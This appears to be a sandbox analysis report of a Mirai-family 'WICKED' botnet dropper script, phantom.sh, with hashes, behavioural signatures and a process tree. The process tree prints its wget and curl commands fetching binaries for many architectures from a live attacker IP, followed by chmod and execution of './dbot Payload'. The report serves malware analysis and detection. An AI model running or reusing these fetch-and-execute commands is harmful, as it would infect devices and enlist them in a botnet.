Overview

overview

10

Static

static

1

phantom.sh

ubuntu-18.04-amd64

10

phantom.sh

debian-9-armhf

10

phantom.sh

debian-9-mips

10

phantom.sh

debian-9-mipsel

10

Analysis

  • max time kernel
    96s
  • max time network
    153s
  • platform
    debian-9_mipsel
  • resource
    debian9-mipsel-20240611-en
  • resource tags

    arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
  • submitted
    23/03/2025, 02:52

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    phantom.sh

  • Size

    1KB

  • MD5

    b25643d9ed071bba8af0ef060b5180bf

  • SHA1

    12c13e5c16cabcd24f9c38b750acd5be92df73ec

  • SHA256

    2e22b8d097eed40f8fd2c985b0a6fb31ed2f6ed8a022cc707ebbf9fc7be549cf

  • SHA512

    5eac9707aa2c220394b2d2be4737451e8b1cba8fe86611656c3ac599ffc6c1b24f4a30e4a40122f57bda4a0ad7d5dc5862cdf779e7f481c7f396bd757fe016c9

Score
10/10
miraiwickedbotnetcredential_accessdefense_evasiondiscovery

Malware Config

Extracted

Family

mirai

Botnet

WICKED

Extracted

Family

mirai

Botnet

WICKED

Extracted

Family

mirai

Botnet

WICKED

Extracted

Family

mirai

Botnet

WICKED

Extracted

Family

mirai

Botnet

WICKED

Signatures

  • Mirai

    Mirai is a prevalent Linux malware infecting exposed network devices.

    botnetmirai
  • Mirai family
    mirai
  • File and Directory Permissions Modification 1 TTPs 8 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

    defense_evasion
  • Executes dropped EXE 8 IoCs
  • Modifies Watchdog functionality 1 TTPs 12 IoCs

    Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

    defense_evasion
  • Enumerates active TCP sockets 1 TTPs 6 IoCs

    Gets active TCP sockets from /proc virtual filesystem.

    discovery
  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Reads process memory 1 TTPs 59 IoCs

    Read the memory of a process through the /proc virtual filesystem. This can be used to steal credentials.

    credential_access
  • Changes its process name 6 IoCs
  • Reads system network configuration 1 TTPs 6 IoCs

    Uses contents of /proc filesystem to enumerate network settings.

    discovery
  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

    discovery
  • System Network Configuration Discovery 1 TTPs 3 IoCs

    Adversaries may gather information about the network configuration of a system.

    discovery
  • Writes file to tmp directory 19 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/phantom.sh
    /tmp/phantom.sh
    1⤵
    • Executes dropped EXE
    • Writes file to tmp directory
    PID:708
    • /usr/bin/wget
      wget http://157.245.211.199/bins/x86
      2⤵
      • Writes file to tmp directory
      PID:712
    • /usr/bin/curl
      curl -O http://157.245.211.199/bins/x86
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:730
    • /bin/cat
      cat x86
      2⤵
        PID:737
      • /bin/chmod
        chmod +x dbot phantom.sh systemd-private-431a5c22c369426d8da8ffd9746f5eb3-systemd-timedated.service-cH0Sj8 x86
        2⤵
        • File and Directory Permissions Modification
        PID:738
      • /tmp/dbot
        ./dbot Payload
        2⤵
          PID:739
        • /usr/bin/wget
          wget http://157.245.211.199/bins/mips
          2⤵
          • System Network Configuration Discovery
          • Writes file to tmp directory
          PID:741
        • /usr/bin/curl
          curl -O http://157.245.211.199/bins/mips
          2⤵
          • System Network Configuration Discovery
          • Writes file to tmp directory
          PID:742
        • /bin/cat
          cat mips
          2⤵
          • System Network Configuration Discovery
          PID:743
        • /bin/chmod
          chmod +x dbot mips phantom.sh systemd-private-431a5c22c369426d8da8ffd9746f5eb3-systemd-timedated.service-cH0Sj8 x86
          2⤵
          • File and Directory Permissions Modification
          PID:744
        • /tmp/dbot
          ./dbot Payload
          2⤵
            PID:745
          • /usr/bin/wget
            wget http://157.245.211.199/bins/mpsl
            2⤵
            • Writes file to tmp directory
            PID:747
          • /usr/bin/curl
            curl -O http://157.245.211.199/bins/mpsl
            2⤵
            • Writes file to tmp directory
            PID:748
          • /bin/cat
            cat mpsl
            2⤵
              PID:749
            • /bin/chmod
              chmod +x dbot mips mpsl phantom.sh systemd-private-431a5c22c369426d8da8ffd9746f5eb3-systemd-timedated.service-cH0Sj8 x86
              2⤵
              • File and Directory Permissions Modification
              PID:750
            • /tmp/dbot
              ./dbot Payload
              2⤵
              • Modifies Watchdog functionality
              • Enumerates active TCP sockets
              • Reads process memory
              • Changes its process name
              • Reads system network configuration
              PID:751
            • /usr/bin/wget
              wget http://157.245.211.199/bins/arm
              2⤵
              • Writes file to tmp directory
              PID:753
            • /usr/bin/curl
              curl -O http://157.245.211.199/bins/arm
              2⤵
              • Reads runtime system information
              • Writes file to tmp directory
              PID:762
            • /bin/chmod
              chmod +x arm dbot mips mpsl phantom.sh systemd-private-431a5c22c369426d8da8ffd9746f5eb3-systemd-timedated.service-cH0Sj8 x86
              2⤵
              • File and Directory Permissions Modification
              PID:775
            • /tmp/dbot
              ./dbot Payload
              2⤵
              • Modifies Watchdog functionality
              • Enumerates active TCP sockets
              • Reads process memory
              • Changes its process name
              • Reads system network configuration
              • Reads runtime system information
              PID:777
            • /usr/bin/wget
              wget http://157.245.211.199/bins/arm5
              2⤵
              • Writes file to tmp directory
              PID:838
            • /usr/bin/curl
              curl -O http://157.245.211.199/bins/arm5
              2⤵
              • Reads runtime system information
              • Writes file to tmp directory
              PID:839
            • /bin/chmod
              chmod +x arm arm5 dbot mips mpsl phantom.sh x86
              2⤵
              • File and Directory Permissions Modification
              PID:845
            • /tmp/dbot
              ./dbot Payload
              2⤵
              • Modifies Watchdog functionality
              • Enumerates active TCP sockets
              • Changes its process name
              • Reads system network configuration
              • Reads runtime system information
              PID:846
            • /usr/bin/wget
              wget http://157.245.211.199/bins/arm6
              2⤵
              • Writes file to tmp directory
              PID:848
            • /usr/bin/curl
              curl -O http://157.245.211.199/bins/arm6
              2⤵
              • Writes file to tmp directory
              PID:851
            • /bin/chmod
              chmod +x arm arm5 arm6 dbot mips mpsl phantom.sh x86
              2⤵
              • File and Directory Permissions Modification
              PID:853
            • /tmp/dbot
              ./dbot Payload
              2⤵
              • Modifies Watchdog functionality
              • Enumerates active TCP sockets
              • Reads process memory
              • Changes its process name
              • Reads system network configuration
              • Reads runtime system information
              PID:854
            • /usr/bin/wget
              wget http://157.245.211.199/bins/arm7
              2⤵
              • Writes file to tmp directory
              PID:856
            • /usr/bin/curl
              curl -O http://157.245.211.199/bins/arm7
              2⤵
              • Reads runtime system information
              • Writes file to tmp directory
              PID:859
            • /bin/chmod
              chmod +x arm arm5 arm6 arm7 dbot mips mpsl phantom.sh x86
              2⤵
              • File and Directory Permissions Modification
              PID:861
            • /tmp/dbot
              ./dbot Payload
              2⤵
              • Modifies Watchdog functionality
              • Enumerates active TCP sockets
              • Reads process memory
              • Changes its process name
              • Reads system network configuration
              • Reads runtime system information
              PID:862
            • /usr/bin/wget
              wget http://157.245.211.199/bins/spc
              2⤵
              • Writes file to tmp directory
              PID:864
            • /usr/bin/curl
              curl -O http://157.245.211.199/bins/spc
              2⤵
              • Reads runtime system information
              • Writes file to tmp directory
              PID:867
            • /bin/chmod
              chmod +x arm arm5 arm6 arm7 dbot mips mpsl phantom.sh spc x86
              2⤵
              • File and Directory Permissions Modification
              PID:869
            • /tmp/dbot
              ./dbot Payload
              2⤵
              • Modifies Watchdog functionality
              • Enumerates active TCP sockets
              • Changes its process name
              • Reads system network configuration
              • Reads runtime system information
              PID:870
            • /usr/bin/wget
              wget http://157.245.211.199/bins/m68k
              2⤵
              • Writes file to tmp directory
              PID:872
            • /usr/bin/curl
              curl -O http://157.245.211.199/bins/m68k
              2⤵
              • Reads runtime system information
              • Writes file to tmp directory
              PID:875

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • /tmp/arm
            Filesize

            65KB

            MD5

            c41a79699de953380428ae97410bb85f

            SHA1

            747a2e1757455604ec6ab089eeec07744b71d79c

            SHA256

            753c2a1eaa8b0212cd1f451ff250d96f46c0d035c02b6909aaf02018b7835ecf

            SHA512

            c0f23806b1d470d24c77cd76e93e4981bf806a8c74cc38322448566976bc0412176847210a1c6bfa1448bff9ef5ba91ffd35bd1857ae80a5bb0448f386c7753c

            Download Submit

          • /tmp/arm5
            Filesize

            41KB

            MD5

            2b9ff651d116fd4220b9ef064edc87ed

            SHA1

            82a30aec3a92d6b9aa928c49c775bdc5c7f368a7

            SHA256

            a683e1c24a8f520953bd275cd7a49788e1fe492c2a1f810a85c5275f0063250e

            SHA512

            e5affabceca41f66b769c7d707e5040e7feaceab8fb45a2953f596c82641d30244030d7d2605a0765d6a29763502563be99a944fa7d993d483f35ec097fd92ea

            Download Submit

          • /tmp/arm6
            Filesize

            73KB

            MD5

            9b4a9ffc8981f7af2b338260b47f8ae7

            SHA1

            5558be7ec4a318c25c659764ebacdc9ca066fdcd

            SHA256

            b76c2cbe3d2450fea49fd42f29c29bc18bced3ef0001f9ac10e057d3a590056d

            SHA512

            80b23756ebaddf8104482a45473f5dedc31ca14ec4eeffab70677a4762b0e4c77350a33c53eac4d5282138e73c1b5f1db2574732c7acae3f098e5e580c7e4b1a

            Download Submit

          • /tmp/arm7
            Filesize

            140KB

            MD5

            a4f6cf4e6edb03734e3fd5d250dfa63b

            SHA1

            1297b2b89a27d8c3615548099cd38cbab48dc406

            SHA256

            5cc8e494a701a2f510cff13ec26bc59ef4c8f0812685a1ff7752a1c613f52f31

            SHA512

            5e1828b4cf29b04a553895af4299a46d83de01f59142737b1a66d121047404636d7c38b4052319fc6c5d5be100af82d7c9c54f4c41f5aa80bc3d423e70e8eb78

            Download Submit

          • /tmp/m68k
            Filesize

            65KB

            MD5

            0a548e5e31b00bd078466d15eb16e546

            SHA1

            0203328ab86cda8492ca3ea86528c4272394e7e8

            SHA256

            3235403721303e205a16197923af1e265a884bbf847e85334f4c9e1872cc21a3

            SHA512

            fb5ceb1dd5786462a89d61e133b587fb5fdec8b638be3f7af288930bb74a600aaf0b8932f6765318a5a9948fd22e83e5ec4c392dd907e298159eddf6a3576cee

            Download Submit

          • /tmp/m68k
            Filesize

            64KB

            MD5

            5e8285b6dc02bd16d38d52e474dc47ef

            SHA1

            b333c8b8acb9202152195e31942c51946dda7fc1

            SHA256

            9db83fadccad4844c9d3cc2295e4611b9523448eeaece1bd67ae7ff2139003a9

            SHA512

            f61c87b8c99686709b64390831810d5c5325740d4b7894768e528928ac5c7b74dad750ee335e809f3d14cae447ee5d74ca664f1c19d385061a9318bc04f5bfa9

            Download Submit

          • /tmp/mips
            Filesize

            82KB

            MD5

            7f3a7052000e43a7ea7b3831d3471c53

            SHA1

            ea0f5ad61681af067cd5c8a6c1fe9f8df20e7fb0

            SHA256

            740e42e867d99cdcdc6e3905156543ac4463f26a20a87cefa21907ffa926fd27

            SHA512

            a93e9477a07d66ea950b8cceba5b9953fb9266606cee61ec8d8dbe854f276b0a8df85ae5f80fb738cb0f3a8f7c322e2953757e392443fba6b85adcd14c602e28

            Download Submit

          • /tmp/mpsl
            Filesize

            82KB

            MD5

            d10cde406bb6e741caa075ae3eb1b59b

            SHA1

            3b8761c325ff59e67ced6151d5c0b483e7009ff0

            SHA256

            33aaa80f492242f0a5e3e8edec511d11b09910e21d044b7425f2b19c79885275

            SHA512

            d475ae20989beac90cb6bd51b2a91536880af3c07c7a5e5de5210670ee0292e599871488659fbf99206aaf1e99e19b5344ef936a0a602abffdf62b4473edb48d

            Download Submit

          • /tmp/spc
            Filesize

            65KB

            MD5

            19d915863ed88ad6cfbed0a9e91875b4

            SHA1

            2a162911ba6df6689052c4f4f215e2a509e875e6

            SHA256

            83ea2fbf03f0177db78259a4eadda417ec881202c66bba84f3f0ee20ed098dba

            SHA512

            b75deb4f8c8f59c8a079b41648d390758a2aa05e763d91e6c834d2344df6050779dcfa7040271f63970cd657d258e4f7294ce1888f0dcdd8b6d77d246447f60a

            Download Submit

          • /tmp/x86
            Filesize

            56KB

            MD5

            a7b4473399ce74c911ec86fe9f3a2295

            SHA1

            16ceb93a19944b099d8da7c0f42faa92954fd8e7

            SHA256

            5064463e3dcdc501a0cd479dcb09b24bd3bd0bf7cbacac0341f09c85f7dce81e

            SHA512

            32031eae5f5e33a5c5c3c2f97d69675e54ddc3b74f85016418d543ff2a806cf92f77ca5b5c1085e5691544ced62c1b05e4d56da01d62d0e07b5555d40d151125

            Download Submit